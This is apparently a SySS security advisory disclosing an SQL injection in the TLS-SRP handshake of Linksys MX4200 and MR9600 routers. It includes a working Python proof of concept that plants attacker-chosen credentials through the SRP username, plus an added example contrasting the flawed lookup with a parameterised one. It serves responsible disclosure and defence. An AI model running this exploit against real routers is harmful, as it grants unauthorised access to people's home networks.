Advisory ID: SYSS-2025-009
Product: MR9600, MX4200 (and potentially others)
Manufacturer: Linksys
Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
                     (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: CVE-2026-27847
Author of Advisory: Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers
faster WiFi performance for lag-free online gaming and simultaneous
streaming to every device and corner of your home."

Due to improper neutralization of special elements, SQL statements can be
injected via the handshake of a TLS-SRP connection. This can be used to
insert known credentials into the database. These credentials can then be
used to successfully complete the handshake and use the protected service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides a service (sct_server
binary) on TCP port 6060 (all interfaces except WAN), which is used to
integrate other mesh devices into the network. The service accepts TLS-SRP
connections with a username and password. To obtain the credential
information for the given username, the service calls a separate script
(smcdb_auth) that queries an SQLite database.

Since the service does not properly neutralize special elements in the
username, arbitrary SQL statements can be injected.
This can be used to insert known credentials into the correct database
table, which then provide access to the protected service (sct_server).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will inject
known credentials into the "authorize" table of the used SQLite database.
These credentials can be used to access the service.

import socket
from tlslite.api import VerifierDB, TLSConnection

# SRP parameters (salt and verifier) for the credentials to be planted
N, g, salt, verifier = VerifierDB.makeVerifier("SySS", "SySS", 1024)
verifier_bytes = verifier.to_bytes(128, "big")

# First handshake: the username carries the injected INSERT. The handshake
# itself fails, but the statement has already been run by smcdb_auth.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
try:
    conn.handshakeClientSRP(f"\"a\n'; INSERT INTO authorize VALUES ('999', '999', 'SySS', 'SySS', '{salt.hex().upper()}', '');--\"", "dummypass")
except Exception:
    pass

# Following handshakes: append the verifier to the planted row, one byte
# per connection, since the username field is too short to carry it whole
for byte in verifier_bytes:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.1.1", 6060))
    conn = TLSConnection(sock)
    try:
        conn.handshakeClientSRP(f"\"a\n'; UPDATE authorize SET verifier = verifier || '{byte.to_bytes(1, 'big').hex().upper()}' where id = 999;--\"", "dummypass")
    except Exception:
        pass

After the code is executed, the TLS-SRP handshake will successfully
complete when authenticating with the username "SySS" and the password
"SySS".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.
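The defect described above is a credential lookup that splices the supplied username into an SQLite statement. The following is an added example, not code from the advisory, from SySS or from Linksys: the vulnerable lookup pattern beside a hardened form (allowlisted input plus bound parameters), run against a constructed in-memory "authorize" table. The column names and the sample rows are assumptions; the advisory only shows that the table has six columns, one of them named "verifier".

```python
import re
import sqlite3

# Constructed schema: column names other than "verifier" are assumptions.
SCHEMA = """
CREATE TABLE authorize (
    id TEXT, ref TEXT, username TEXT, display TEXT, salt TEXT, verifier TEXT);
INSERT INTO authorize VALUES ('1', '1', 'node1', 'node1', 'A1B2', 'C3D4');
"""

# Username shaped like the advisory's PoC: closes the quoted literal,
# appends an INSERT and comments out whatever the script puts after it.
INJECTED_USERNAME = ("a'; INSERT INTO authorize VALUES "
                     "('999','999','SySS','SySS','0102','');--")

# Allowlist for what a legitimate mesh-node username may look like (assumed).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def account_count(db):
    return db.execute("SELECT COUNT(*) FROM authorize").fetchone()[0]


def lookup_vulnerable(db, username):
    """Defect class in smcdb_auth: the username becomes statement text.

    executescript stands in for handing the whole string to the SQLite
    engine. Returns how many rows the 'read-only' lookup modified, which
    is a useful audit signal: a lookup should never change anything."""
    sql = f"SELECT salt, verifier FROM authorize WHERE username = '{username}';"
    before = db.total_changes
    db.executescript(sql)
    return db.total_changes - before


def lookup_safe(db, username):
    """Hardened form: reject unexpected characters, then bind the value so
    SQLite treats it as data rather than syntax. Returns (salt, verifier)
    or None when there is no such account."""
    if not USERNAME_RE.fullmatch(username):
        return None
    return db.execute(
        "SELECT salt, verifier FROM authorize WHERE username = ?", (username,)
    ).fetchone()
```

With the vulnerable lookup the injected username adds a row that the safe lookup afterwards resolves for "SySS"; with the safe lookup the same string is rejected and the table is untouched.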
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-009
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS GmbH.

E-Mail: christian.zaeske@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en